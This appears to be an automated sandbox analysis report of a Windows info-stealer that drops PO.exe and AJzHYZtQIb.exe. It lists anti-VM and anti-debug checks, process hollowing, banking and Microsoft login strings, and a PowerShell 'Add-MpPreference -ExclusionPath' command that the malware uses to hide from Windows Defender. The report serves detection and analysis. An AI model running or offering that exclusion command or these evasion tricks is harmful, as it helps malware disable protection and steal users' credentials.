                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 8DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 9DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 9FE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: AFE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2CC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2F60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2CC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 8F00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 78A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 8F00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 10D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory allocated: 2DF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6787Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1105Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8020Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1006Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWindow / User API: threadDelayed 1705Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWindow / User API: threadDelayed 4241Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWindow / User API: threadDelayed 1893
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWindow / User API: threadDelayed 6517
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7832Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 3292Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 8136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 4996Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 8060Thread sleep time: -23058430092136925s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7060Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00174D8A
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00188590
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001986E8 FindFirstFileExA,0_2_001986E8
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018BC1D VirtualQuery,GetSystemInfo,0_2_0018BC1D
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: tmp37DC.tmp.14.drBinary or memory string: discord.comVMware20,11696428655f
                      Source: tmp37DC.tmp.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: global block list test formVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: tmp37DC.tmp.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: tmp37DC.tmp.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: tmp37DC.tmp.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: tmp37DC.tmp.14.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: tmp37DC.tmp.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2356294737.000000000118F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: tmp37DC.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: tmp37DC.tmp.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: tmp37DC.tmp.14.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: AJzHYZtQIb.exe, 00000010.00000002.2243982983.00000000012B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: tmp37DC.tmp.14.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: tmp37DC.tmp.14.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: PO.exe, 00000007.00000002.2162816611.0000000007044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: tmp37DC.tmp.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: tmp37DC.tmp.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: tmp37DC.tmp.14.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: tmp37DC.tmp.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: tmp37DC.tmp.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeAPI call chain: ExitProcess graph end nodegraph_0-25877
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0018D242
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001953C2 mov eax, dword ptr fs:[00000030h]0_2_001953C2
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001993D0 GetProcessHeap,0_2_001993D0
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0018D242
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001912B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001912B4
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D3E5 SetUnhandledExceptionFilter,0_2_0018D3E5
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018C69D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0018C69D
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeMemory written: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMemory written: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe base: 400000 value starts with: 4D5A
